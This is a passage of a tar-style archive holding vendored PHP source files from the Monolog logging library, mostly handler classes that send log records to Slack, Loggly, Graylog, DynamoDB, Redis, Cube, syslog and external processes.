full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\FingersCrossed; use Monolog\Logger; use Psr\Log\LogLevel; /** * Error level based activation strategy. * * @author Johannes M. Schmitt * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class ErrorLevelActivationStrategy implements ActivationStrategyInterface { /** * @var Level */ private $actionLevel; /** * @param int|string $actionLevel Level or name or value * * @phpstan-param Level|LevelName|LogLevel::* $actionLevel */ public function __construct($actionLevel) { $this->actionLevel = Logger::toMonologLevel($actionLevel); } public function isHandlerActivated(array $record): bool { return $record['level'] >= $this->actionLevel; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossed/ActivationStrategyInterface.php000064400000001320147600400120030052 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\FingersCrossed; /** * Interface for activation strategies for the FingersCrossedHandler. * * @author Johannes M. Schmitt * * @phpstan-import-type Record from \Monolog\Logger */ interface ActivationStrategyInterface { /** * Returns whether the given record activates the handler. * * @phpstan-param Record $record */ public function isHandlerActivated(array $record): bool; } google-api/vendor/monolog/monolog/src/Monolog/Handler/Slack/SlackRecord.php000064400000024677147600400120022742 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\Slack; use Monolog\Logger; use Monolog\Utils; use Monolog\Formatter\NormalizerFormatter; use Monolog\Formatter\FormatterInterface; /** * Slack record utility helping to log to Slack webhooks or API. * * @author Greg Kedzierski * @author Haralan Dobrev * @see https://api.slack.com/incoming-webhooks * @see https://api.slack.com/docs/message-attachments * * @phpstan-import-type FormattedRecord from \Monolog\Handler\AbstractProcessingHandler * @phpstan-import-type Record from \Monolog\Logger */ class SlackRecord { public const COLOR_DANGER = 'danger'; public const COLOR_WARNING = 'warning'; public const COLOR_GOOD = 'good'; public const COLOR_DEFAULT = '#e3e4e6'; /** * Slack channel (encoded ID or name) * @var string|null */ private $channel; /** * Name of a bot * @var string|null */ private $username; /** * User icon e.g. 'ghost', 'http://example.com/user.png' * @var string|null */ private $userIcon; /** * Whether the message should be added to Slack as attachment (plain text otherwise) * @var bool */ private $useAttachment; /** * Whether the the context/extra messages added to Slack as attachments are in a short style * @var bool */ private $useShortAttachment; /** * Whether the attachment should include context and extra data * @var bool */ private $includeContextAndExtra; /** * Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] * @var string[] */ private $excludeFields; /** * @var ?FormatterInterface */ private $formatter; /** * @var NormalizerFormatter */ private $normalizerFormatter; /** * @param string[] $excludeFields */ public function __construct( ?string $channel = null, ?string $username = null, bool $useAttachment = true, ?string $userIcon = null, bool $useShortAttachment = false, bool $includeContextAndExtra = false, array $excludeFields = array(), FormatterInterface $formatter = null ) { $this ->setChannel($channel) ->setUsername($username) ->useAttachment($useAttachment) ->setUserIcon($userIcon) ->useShortAttachment($useShortAttachment) ->includeContextAndExtra($includeContextAndExtra) ->excludeFields($excludeFields) ->setFormatter($formatter); if ($this->includeContextAndExtra) { $this->normalizerFormatter = new NormalizerFormatter(); } } /** * Returns required data in format that Slack * is expecting. * * @phpstan-param FormattedRecord $record * @phpstan-return mixed[] */ public function getSlackData(array $record): array { $dataArray = array(); $record = $this->removeExcludedFields($record); if ($this->username) { $dataArray['username'] = $this->username; } if ($this->channel) { $dataArray['channel'] = $this->channel; } if ($this->formatter && !$this->useAttachment) { /** @phpstan-ignore-next-line */ $message = $this->formatter->format($record); } else { $message = $record['message']; } if ($this->useAttachment) { $attachment = array( 'fallback' => $message, 'text' => $message, 'color' => $this->getAttachmentColor($record['level']), 'fields' => array(), 'mrkdwn_in' => array('fields'), 'ts' => $record['datetime']->getTimestamp(), 'footer' => $this->username, 'footer_icon' => $this->userIcon, ); if ($this->useShortAttachment) { $attachment['title'] = $record['level_name']; } else { $attachment['title'] = 'Message'; $attachment['fields'][] = $this->generateAttachmentField('Level', $record['level_name']); } if ($this->includeContextAndExtra) { foreach (array('extra', 'context') as $key) { if (empty($record[$key])) { continue; } if ($this->useShortAttachment) { $attachment['fields'][] = $this->generateAttachmentField( (string) $key, $record[$key] ); } else { // Add all extra fields as individual fields in attachment $attachment['fields'] = array_merge( $attachment['fields'], $this->generateAttachmentFields($record[$key]) ); } } } $dataArray['attachments'] = array($attachment); } else { $dataArray['text'] = $message; } if ($this->userIcon) { if (filter_var($this->userIcon, FILTER_VALIDATE_URL)) { $dataArray['icon_url'] = $this->userIcon; } else { $dataArray['icon_emoji'] = ":{$this->userIcon}:"; } } return $dataArray; } /** * Returns a Slack message attachment color associated with * provided level. */ public function getAttachmentColor(int $level): string { switch (true) { case $level >= Logger::ERROR: return static::COLOR_DANGER; case $level >= Logger::WARNING: return static::COLOR_WARNING; case $level >= Logger::INFO: return static::COLOR_GOOD; default: return static::COLOR_DEFAULT; } } /** * Stringifies an array of key/value pairs to be used in attachment fields * * @param mixed[] $fields */ public function stringify(array $fields): string { /** @var Record $fields */ $normalized = $this->normalizerFormatter->format($fields); $hasSecondDimension = count(array_filter($normalized, 'is_array')); $hasNonNumericKeys = !count(array_filter(array_keys($normalized), 'is_numeric')); return $hasSecondDimension || $hasNonNumericKeys ? Utils::jsonEncode($normalized, JSON_PRETTY_PRINT|Utils::DEFAULT_JSON_FLAGS) : Utils::jsonEncode($normalized, Utils::DEFAULT_JSON_FLAGS); } /** * Channel used by the bot when posting * * @param ?string $channel * * @return static */ public function setChannel(?string $channel = null): self { $this->channel = $channel; return $this; } /** * Username used by the bot when posting * * @param ?string $username * * @return static */ public function setUsername(?string $username = null): self { $this->username = $username; return $this; } public function useAttachment(bool $useAttachment = true): self { $this->useAttachment = $useAttachment; return $this; } public function setUserIcon(?string $userIcon = null): self { $this->userIcon = $userIcon; if (\is_string($userIcon)) { $this->userIcon = trim($userIcon, ':'); } return $this; } public function useShortAttachment(bool $useShortAttachment = false): self { $this->useShortAttachment = $useShortAttachment; return $this; } public function includeContextAndExtra(bool $includeContextAndExtra = false): self { $this->includeContextAndExtra = $includeContextAndExtra; if ($this->includeContextAndExtra) { $this->normalizerFormatter = new NormalizerFormatter(); } return $this; } /** * @param string[] $excludeFields */ public function excludeFields(array $excludeFields = []): self { $this->excludeFields = $excludeFields; return $this; } public function setFormatter(?FormatterInterface $formatter = null): self { $this->formatter = $formatter; return $this; } /** * Generates attachment field * * @param string|mixed[] $value * * @return array{title: string, value: string, short: false} */ private function generateAttachmentField(string $title, $value): array { $value = is_array($value) ? sprintf('```%s```', substr($this->stringify($value), 0, 1990)) : $value; return array( 'title' => ucfirst($title), 'value' => $value, 'short' => false, ); } /** * Generates a collection of attachment fields from array * * @param mixed[] $data * * @return array */ private function generateAttachmentFields(array $data): array { /** @var Record $data */ $normalized = $this->normalizerFormatter->format($data); $fields = array(); foreach ($normalized as $key => $value) { $fields[] = $this->generateAttachmentField((string) $key, $value); } return $fields; } /** * Get a copy of record with fields excluded according to $this->excludeFields * * @phpstan-param FormattedRecord $record * * @return mixed[] */ private function removeExcludedFields(array $record): array { foreach ($this->excludeFields as $field) { $keys = explode('.', $field); $node = &$record; $lastKey = end($keys); foreach ($keys as $key) { if (!isset($node[$key])) { break; } if ($lastKey === $key) { unset($node[$key]); break; } $node = &$node[$key]; } } return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SyslogUdp/UdpSocket.php000064400000004170147600400120023325 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler\SyslogUdp; use Monolog\Utils; use Socket; class UdpSocket { protected const DATAGRAM_MAX_LENGTH = 65023; /** @var string */ protected $ip; /** @var int */ protected $port; /** @var resource|Socket|null */ protected $socket = null; public function __construct(string $ip, int $port = 514) { $this->ip = $ip; $this->port = $port; } /** * @param string $line * @param string $header * @return void */ public function write($line, $header = "") { $this->send($this->assembleMessage($line, $header)); } public function close(): void { if (is_resource($this->socket) || $this->socket instanceof Socket) { socket_close($this->socket); $this->socket = null; } } /** * @return resource|Socket */ protected function getSocket() { if (null !== $this->socket) { return $this->socket; } $domain = AF_INET; $protocol = SOL_UDP; // Check if we are using unix sockets. if ($this->port === 0) { $domain = AF_UNIX; $protocol = IPPROTO_IP; } $this->socket = socket_create($domain, SOCK_DGRAM, $protocol) ?: null; if (null === $this->socket) { throw new \RuntimeException('The UdpSocket to '.$this->ip.':'.$this->port.' could not be opened via socket_create'); } return $this->socket; } protected function send(string $chunk): void { socket_sendto($this->getSocket(), $chunk, strlen($chunk), $flags = 0, $this->ip, $this->port); } protected function assembleMessage(string $line, string $header): string { $chunkSize = static::DATAGRAM_MAX_LENGTH - strlen($header); return $header . Utils::substr($line, 0, $chunkSize); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ProcessableHandlerTrait.php000064400000003311147600400120024233 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\ResettableInterface; use Monolog\Processor\ProcessorInterface; /** * Helper trait for implementing ProcessableInterface * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger */ trait ProcessableHandlerTrait { /** * @var callable[] * @phpstan-var array */ protected $processors = []; /** * {@inheritDoc} */ public function pushProcessor(callable $callback): HandlerInterface { array_unshift($this->processors, $callback); return $this; } /** * {@inheritDoc} */ public function popProcessor(): callable { if (!$this->processors) { throw new \LogicException('You tried to pop from an empty processor stack.'); } return array_shift($this->processors); } /** * Processes a record. * * @phpstan-param Record $record * @phpstan-return Record */ protected function processRecord(array $record): array { foreach ($this->processors as $processor) { $record = $processor($record); } return $record; } protected function resetProcessors(): void { foreach ($this->processors as $processor) { if ($processor instanceof ResettableInterface) { $processor->reset(); } } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ProcessHandler.php000064400000012137147600400120022411 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; /** * Stores to STDIN of any process, specified by a command. * * Usage example: *
 * $log = new Logger('myLogger');
 * $log->pushHandler(new ProcessHandler('/usr/bin/php /var/www/monolog/someScript.php'));
* * @author Kolja Zuelsdorf */ class ProcessHandler extends AbstractProcessingHandler { /** * Holds the process to receive data on its STDIN. * * @var resource|bool|null */ private $process; /** * @var string */ private $command; /** * @var string|null */ private $cwd; /** * @var resource[] */ private $pipes = []; /** * @var array */ protected const DESCRIPTOR_SPEC = [ 0 => ['pipe', 'r'], // STDIN is a pipe that the child will read from 1 => ['pipe', 'w'], // STDOUT is a pipe that the child will write to 2 => ['pipe', 'w'], // STDERR is a pipe to catch the any errors ]; /** * @param string $command Command for the process to start. Absolute paths are recommended, * especially if you do not use the $cwd parameter. * @param string|null $cwd "Current working directory" (CWD) for the process to be executed in. * @throws \InvalidArgumentException */ public function __construct(string $command, $level = Logger::DEBUG, bool $bubble = true, ?string $cwd = null) { if ($command === '') { throw new \InvalidArgumentException('The command argument must be a non-empty string.'); } if ($cwd === '') { throw new \InvalidArgumentException('The optional CWD argument must be a non-empty string or null.'); } parent::__construct($level, $bubble); $this->command = $command; $this->cwd = $cwd; } /** * Writes the record down to the log of the implementing handler * * @throws \UnexpectedValueException */ protected function write(array $record): void { $this->ensureProcessIsStarted(); $this->writeProcessInput($record['formatted']); $errors = $this->readProcessErrors(); if (empty($errors) === false) { throw new \UnexpectedValueException(sprintf('Errors while writing to process: %s', $errors)); } } /** * Makes sure that the process is actually started, and if not, starts it, * assigns the stream pipes, and handles startup errors, if any. */ private function ensureProcessIsStarted(): void { if (is_resource($this->process) === false) { $this->startProcess(); $this->handleStartupErrors(); } } /** * Starts the actual process and sets all streams to non-blocking. */ private function startProcess(): void { $this->process = proc_open($this->command, static::DESCRIPTOR_SPEC, $this->pipes, $this->cwd); foreach ($this->pipes as $pipe) { stream_set_blocking($pipe, false); } } /** * Selects the STDERR stream, handles upcoming startup errors, and throws an exception, if any. * * @throws \UnexpectedValueException */ private function handleStartupErrors(): void { $selected = $this->selectErrorStream(); if (false === $selected) { throw new \UnexpectedValueException('Something went wrong while selecting a stream.'); } $errors = $this->readProcessErrors(); if (is_resource($this->process) === false || empty($errors) === false) { throw new \UnexpectedValueException( sprintf('The process "%s" could not be opened: ' . $errors, $this->command) ); } } /** * Selects the STDERR stream. * * @return int|bool */ protected function selectErrorStream() { $empty = []; $errorPipes = [$this->pipes[2]]; return stream_select($errorPipes, $empty, $empty, 1); } /** * Reads the errors of the process, if there are any. * * @codeCoverageIgnore * @return string Empty string if there are no errors. */ protected function readProcessErrors(): string { return (string) stream_get_contents($this->pipes[2]); } /** * Writes to the input stream of the opened process. * * @codeCoverageIgnore */ protected function writeProcessInput(string $string): void { fwrite($this->pipes[0], $string); } /** * {@inheritDoc} */ public function close(): void { if (is_resource($this->process)) { foreach ($this->pipes as $pipe) { fclose($pipe); } proc_close($this->process); $this->process = null; } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/HandlerInterface.php000064400000005730147600400120022674 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * Interface that all Monolog Handlers must implement * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ interface HandlerInterface { /** * Checks whether the given record will be handled by this handler. * * This is mostly done for performance reasons, to avoid calling processors for nothing. * * Handlers should still check the record levels within handle(), returning false in isHandling() * is no guarantee that handle() will not be called, and isHandling() might not be called * for a given record. * * @param array $record Partial log record containing only a level key * * @return bool * * @phpstan-param array{level: Level} $record */ public function isHandling(array $record): bool; /** * Handles a record. * * All records may be passed to this method, and the handler should discard * those that it does not want to handle. * * The return value of this function controls the bubbling process of the handler stack. * Unless the bubbling is interrupted (by returning true), the Logger class will keep on * calling further handlers in the stack with a given log record. * * @param array $record The record to handle * @return bool true means that this handler handled the record, and that bubbling is not permitted. * false means the record was either not processed or that this handler allows bubbling. * * @phpstan-param Record $record */ public function handle(array $record): bool; /** * Handles a set of records at once. * * @param array $records The records to handle (an array of record arrays) * * @phpstan-param Record[] $records */ public function handleBatch(array $records): void; /** * Closes the handler. * * Ends a log cycle and frees all resources used by the handler. * * Closing a Handler means flushing all buffers and freeing any open resources/handles. * * Implementations have to be idempotent (i.e. it should be possible to call close several times without breakage) * and ideally handlers should be able to reopen themselves on handle() after they have been closed. * * This is useful at the end of a request and will be called automatically when the object * is destroyed if you extend Monolog\Handler\Handler. * * If you are thinking of calling this method yourself, most likely you should be * calling ResettableInterface::reset instead. Have a look. */ public function close(): void; } google-api/vendor/monolog/monolog/src/Monolog/Handler/GelfHandler.php000064400000002567147600400120021656 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Gelf\PublisherInterface; use Monolog\Logger; use Monolog\Formatter\GelfMessageFormatter; use Monolog\Formatter\FormatterInterface; /** * Handler to send messages to a Graylog2 (http://www.graylog2.org) server * * @author Matt Lehner * @author Benjamin Zikarsky */ class GelfHandler extends AbstractProcessingHandler { /** * @var PublisherInterface the publisher object that sends the message to the server */ protected $publisher; /** * @param PublisherInterface $publisher a gelf publisher object */ public function __construct(PublisherInterface $publisher, $level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); $this->publisher = $publisher; } /** * {@inheritDoc} */ protected function write(array $record): void { $this->publisher->publish($record['formatted']); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new GelfMessageFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/DynamoDbHandler.php000064400000004662147600400120022474 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Aws\Sdk; use Aws\DynamoDb\DynamoDbClient; use Monolog\Formatter\FormatterInterface; use Aws\DynamoDb\Marshaler; use Monolog\Formatter\ScalarFormatter; use Monolog\Logger; /** * Amazon DynamoDB handler (http://aws.amazon.com/dynamodb/) * * @link https://github.com/aws/aws-sdk-php/ * @author Andrew Lawson */ class DynamoDbHandler extends AbstractProcessingHandler { public const DATE_FORMAT = 'Y-m-d\TH:i:s.uO'; /** * @var DynamoDbClient */ protected $client; /** * @var string */ protected $table; /** * @var int */ protected $version; /** * @var Marshaler */ protected $marshaler; public function __construct(DynamoDbClient $client, string $table, $level = Logger::DEBUG, bool $bubble = true) { /** @phpstan-ignore-next-line */ if (defined('Aws\Sdk::VERSION') && version_compare(Sdk::VERSION, '3.0', '>=')) { $this->version = 3; $this->marshaler = new Marshaler; } else { $this->version = 2; } $this->client = $client; $this->table = $table; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $filtered = $this->filterEmptyFields($record['formatted']); if ($this->version === 3) { $formatted = $this->marshaler->marshalItem($filtered); } else { /** @phpstan-ignore-next-line */ $formatted = $this->client->formatAttributes($filtered); } $this->client->putItem([ 'TableName' => $this->table, 'Item' => $formatted, ]); } /** * @param mixed[] $record * @return mixed[] */ protected function filterEmptyFields(array $record): array { return array_filter($record, function ($value) { return !empty($value) || false === $value || 0 === $value; }); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new ScalarFormatter(self::DATE_FORMAT); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SwiftMailerHandler.php000064400000007125147600400120023222 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; use Swift_Message; use Swift; /** * SwiftMailerHandler uses Swift_Mailer to send the emails * * @author Gyula Sallai * * @phpstan-import-type Record from \Monolog\Logger * @deprecated Since Monolog 2.6. Use SymfonyMailerHandler instead. */ class SwiftMailerHandler extends MailHandler { /** @var \Swift_Mailer */ protected $mailer; /** @var Swift_Message|callable(string, Record[]): Swift_Message */ private $messageTemplate; /** * @psalm-param Swift_Message|callable(string, Record[]): Swift_Message $message * * @param \Swift_Mailer $mailer The mailer to use * @param callable|Swift_Message $message An example message for real messages, only the body will be replaced */ public function __construct(\Swift_Mailer $mailer, $message, $level = Logger::ERROR, bool $bubble = true) { parent::__construct($level, $bubble); @trigger_error('The SwiftMailerHandler is deprecated since Monolog 2.6. Use SymfonyMailerHandler instead.', E_USER_DEPRECATED); $this->mailer = $mailer; $this->messageTemplate = $message; } /** * {@inheritDoc} */ protected function send(string $content, array $records): void { $this->mailer->send($this->buildMessage($content, $records)); } /** * Gets the formatter for the Swift_Message subject. * * @param string|null $format The format of the subject */ protected function getSubjectFormatter(?string $format): FormatterInterface { return new LineFormatter($format); } /** * Creates instance of Swift_Message to be sent * * @param string $content formatted email body to be sent * @param array $records Log records that formed the content * @return Swift_Message * * @phpstan-param Record[] $records */ protected function buildMessage(string $content, array $records): Swift_Message { $message = null; if ($this->messageTemplate instanceof Swift_Message) { $message = clone $this->messageTemplate; $message->generateId(); } elseif (is_callable($this->messageTemplate)) { $message = ($this->messageTemplate)($content, $records); } if (!$message instanceof Swift_Message) { $record = reset($records); throw new \InvalidArgumentException('Could not resolve message as instance of Swift_Message or a callable returning it' . ($record ? Utils::getRecordMessageForException($record) : '')); } if ($records) { $subjectFormatter = $this->getSubjectFormatter($message->getSubject()); $message->setSubject($subjectFormatter->format($this->getHighestRecord($records))); } $mime = 'text/plain'; if ($this->isHtmlBody($content)) { $mime = 'text/html'; } $message->setBody($content, $mime); /** @phpstan-ignore-next-line */ if (version_compare(Swift::VERSION, '6.0.0', '>=')) { $message->setDate(new \DateTimeImmutable()); } else { /** @phpstan-ignore-next-line */ $message->setDate(time()); } return $message; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/RedisPubSubHandler.php000064400000003434147600400120023162 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\LineFormatter; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; /** * Sends the message to a Redis Pub/Sub channel using PUBLISH * * usage example: * * $log = new Logger('application'); * $redis = new RedisPubSubHandler(new Predis\Client("tcp://localhost:6379"), "logs", Logger::WARNING); * $log->pushHandler($redis); * * @author Gaëtan Faugère */ class RedisPubSubHandler extends AbstractProcessingHandler { /** @var \Predis\Client<\Predis\Client>|\Redis */ private $redisClient; /** @var string */ private $channelKey; /** * @param \Predis\Client<\Predis\Client>|\Redis $redis The redis instance * @param string $key The channel key to publish records to */ public function __construct($redis, string $key, $level = Logger::DEBUG, bool $bubble = true) { if (!(($redis instanceof \Predis\Client) || ($redis instanceof \Redis))) { throw new \InvalidArgumentException('Predis\Client or Redis instance required'); } $this->redisClient = $redis; $this->channelKey = $key; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $this->redisClient->publish($this->channelKey, $record["formatted"]); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/LogglyHandler.php000064400000010002147600400120022215 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LogglyFormatter; use function array_key_exists; use CurlHandle; /** * Sends errors to Loggly. * * @author Przemek Sobstel * @author Adam Pancutt * @author Gregory Barchard */ class LogglyHandler extends AbstractProcessingHandler { protected const HOST = 'logs-01.loggly.com'; protected const ENDPOINT_SINGLE = 'inputs'; protected const ENDPOINT_BATCH = 'bulk'; /** * Caches the curl handlers for every given endpoint. * * @var resource[]|CurlHandle[] */ protected $curlHandlers = []; /** @var string */ protected $token; /** @var string[] */ protected $tag = []; /** * @param string $token API token supplied by Loggly * * @throws MissingExtensionException If the curl extension is missing */ public function __construct(string $token, $level = Logger::DEBUG, bool $bubble = true) { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is needed to use the LogglyHandler'); } $this->token = $token; parent::__construct($level, $bubble); } /** * Loads and returns the shared curl handler for the given endpoint. * * @param string $endpoint * * @return resource|CurlHandle */ protected function getCurlHandler(string $endpoint) { if (!array_key_exists($endpoint, $this->curlHandlers)) { $this->curlHandlers[$endpoint] = $this->loadCurlHandle($endpoint); } return $this->curlHandlers[$endpoint]; } /** * Starts a fresh curl session for the given endpoint and returns its handler. * * @param string $endpoint * * @return resource|CurlHandle */ private function loadCurlHandle(string $endpoint) { $url = sprintf("https://%s/%s/%s/", static::HOST, $endpoint, $this->token); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); return $ch; } /** * @param string[]|string $tag */ public function setTag($tag): self { $tag = !empty($tag) ? $tag : []; $this->tag = is_array($tag) ? $tag : [$tag]; return $this; } /** * @param string[]|string $tag */ public function addTag($tag): self { if (!empty($tag)) { $tag = is_array($tag) ? $tag : [$tag]; $this->tag = array_unique(array_merge($this->tag, $tag)); } return $this; } protected function write(array $record): void { $this->send($record["formatted"], static::ENDPOINT_SINGLE); } public function handleBatch(array $records): void { $level = $this->level; $records = array_filter($records, function ($record) use ($level) { return ($record['level'] >= $level); }); if ($records) { $this->send($this->getFormatter()->formatBatch($records), static::ENDPOINT_BATCH); } } protected function send(string $data, string $endpoint): void { $ch = $this->getCurlHandler($endpoint); $headers = ['Content-Type: application/json']; if (!empty($this->tag)) { $headers[] = 'X-LOGGLY-TAG: '.implode(',', $this->tag); } curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); Curl\Util::execute($ch, 5, false); } protected function getDefaultFormatter(): FormatterInterface { return new LogglyFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/CubeHandler.php000064400000012427147600400120021653 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; /** * Logs to Cube. * * @link https://github.com/square/cube/wiki * @author Wan Chen * @deprecated Since 2.8.0 and 3.2.0, Cube appears abandoned and thus we will drop this handler in Monolog 4 */ class CubeHandler extends AbstractProcessingHandler { /** @var resource|\Socket|null */ private $udpConnection = null; /** @var resource|\CurlHandle|null */ private $httpConnection = null; /** @var string */ private $scheme; /** @var string */ private $host; /** @var int */ private $port; /** @var string[] */ private $acceptedSchemes = ['http', 'udp']; /** * Create a Cube handler * * @throws \UnexpectedValueException when given url is not a valid url. * A valid url must consist of three parts : protocol://host:port * Only valid protocols used by Cube are http and udp */ public function __construct(string $url, $level = Logger::DEBUG, bool $bubble = true) { $urlInfo = parse_url($url); if ($urlInfo === false || !isset($urlInfo['scheme'], $urlInfo['host'], $urlInfo['port'])) { throw new \UnexpectedValueException('URL "'.$url.'" is not valid'); } if (!in_array($urlInfo['scheme'], $this->acceptedSchemes)) { throw new \UnexpectedValueException( 'Invalid protocol (' . $urlInfo['scheme'] . ').' . ' Valid options are ' . implode(', ', $this->acceptedSchemes) ); } $this->scheme = $urlInfo['scheme']; $this->host = $urlInfo['host']; $this->port = (int) $urlInfo['port']; parent::__construct($level, $bubble); } /** * Establish a connection to an UDP socket * * @throws \LogicException when unable to connect to the socket * @throws MissingExtensionException when there is no socket extension */ protected function connectUdp(): void { if (!extension_loaded('sockets')) { throw new MissingExtensionException('The sockets extension is required to use udp URLs with the CubeHandler'); } $udpConnection = socket_create(AF_INET, SOCK_DGRAM, 0); if (false === $udpConnection) { throw new \LogicException('Unable to create a socket'); } $this->udpConnection = $udpConnection; if (!socket_connect($this->udpConnection, $this->host, $this->port)) { throw new \LogicException('Unable to connect to the socket at ' . $this->host . ':' . $this->port); } } /** * Establish a connection to an http server * * @throws \LogicException when unable to connect to the socket * @throws MissingExtensionException when no curl extension */ protected function connectHttp(): void { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is required to use http URLs with the CubeHandler'); } $httpConnection = curl_init('http://'.$this->host.':'.$this->port.'/1.0/event/put'); if (false === $httpConnection) { throw new \LogicException('Unable to connect to ' . $this->host . ':' . $this->port); } $this->httpConnection = $httpConnection; curl_setopt($this->httpConnection, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($this->httpConnection, CURLOPT_RETURNTRANSFER, true); } /** * {@inheritDoc} */ protected function write(array $record): void { $date = $record['datetime']; $data = ['time' => $date->format('Y-m-d\TH:i:s.uO')]; unset($record['datetime']); if (isset($record['context']['type'])) { $data['type'] = $record['context']['type']; unset($record['context']['type']); } else { $data['type'] = $record['channel']; } $data['data'] = $record['context']; $data['data']['level'] = $record['level']; if ($this->scheme === 'http') { $this->writeHttp(Utils::jsonEncode($data)); } else { $this->writeUdp(Utils::jsonEncode($data)); } } private function writeUdp(string $data): void { if (!$this->udpConnection) { $this->connectUdp(); } socket_send($this->udpConnection, $data, strlen($data), 0); } private function writeHttp(string $data): void { if (!$this->httpConnection) { $this->connectHttp(); } if (null === $this->httpConnection) { throw new \LogicException('No connection could be established'); } curl_setopt($this->httpConnection, CURLOPT_POSTFIELDS, '['.$data.']'); curl_setopt($this->httpConnection, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'Content-Length: ' . strlen('['.$data.']'), ]); Curl\Util::execute($this->httpConnection, 5, false); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SlackWebhookHandler.php000064400000007523147600400120023352 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; use Monolog\Utils; use Monolog\Handler\Slack\SlackRecord; /** * Sends notifications through Slack Webhooks * * @author Haralan Dobrev * @see https://api.slack.com/incoming-webhooks */ class SlackWebhookHandler extends AbstractProcessingHandler { /** * Slack Webhook token * @var string */ private $webhookUrl; /** * Instance of the SlackRecord util class preparing data for Slack API. * @var SlackRecord */ private $slackRecord; /** * @param string $webhookUrl Slack Webhook URL * @param string|null $channel Slack channel (encoded ID or name) * @param string|null $username Name of a bot * @param bool $useAttachment Whether the message should be added to Slack as attachment (plain text otherwise) * @param string|null $iconEmoji The emoji name to use (or null) * @param bool $useShortAttachment Whether the the context/extra messages added to Slack as attachments are in a short style * @param bool $includeContextAndExtra Whether the attachment should include context and extra data * @param string[] $excludeFields Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] */ public function __construct( string $webhookUrl, ?string $channel = null, ?string $username = null, bool $useAttachment = true, ?string $iconEmoji = null, bool $useShortAttachment = false, bool $includeContextAndExtra = false, $level = Logger::CRITICAL, bool $bubble = true, array $excludeFields = array() ) { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is needed to use the SlackWebhookHandler'); } parent::__construct($level, $bubble); $this->webhookUrl = $webhookUrl; $this->slackRecord = new SlackRecord( $channel, $username, $useAttachment, $iconEmoji, $useShortAttachment, $includeContextAndExtra, $excludeFields ); } public function getSlackRecord(): SlackRecord { return $this->slackRecord; } public function getWebhookUrl(): string { return $this->webhookUrl; } /** * {@inheritDoc} */ protected function write(array $record): void { $postData = $this->slackRecord->getSlackData($record); $postString = Utils::jsonEncode($postData); $ch = curl_init(); $options = array( CURLOPT_URL => $this->webhookUrl, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array('Content-type: application/json'), CURLOPT_POSTFIELDS => $postString, ); if (defined('CURLOPT_SAFE_UPLOAD')) { $options[CURLOPT_SAFE_UPLOAD] = true; } curl_setopt_array($ch, $options); Curl\Util::execute($ch); } public function setFormatter(FormatterInterface $formatter): HandlerInterface { parent::setFormatter($formatter); $this->slackRecord->setFormatter($formatter); return $this; } public function getFormatter(): FormatterInterface { $formatter = parent::getFormatter(); $this->slackRecord->setFormatter($formatter); return 